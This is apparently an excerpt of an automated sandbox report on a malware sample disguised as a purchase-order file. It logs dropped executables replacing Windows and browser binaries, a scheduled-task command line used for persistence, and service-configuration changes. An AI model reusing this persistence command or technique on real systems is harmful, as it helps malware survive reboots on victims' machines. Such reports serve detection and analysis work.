                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

                  Boot Survival

                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 9_2_00F6CBD0 StrStrIW,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,StartServiceW

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\TieringEngineService.exe | File created: C:\System Volume Information\Heat\
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
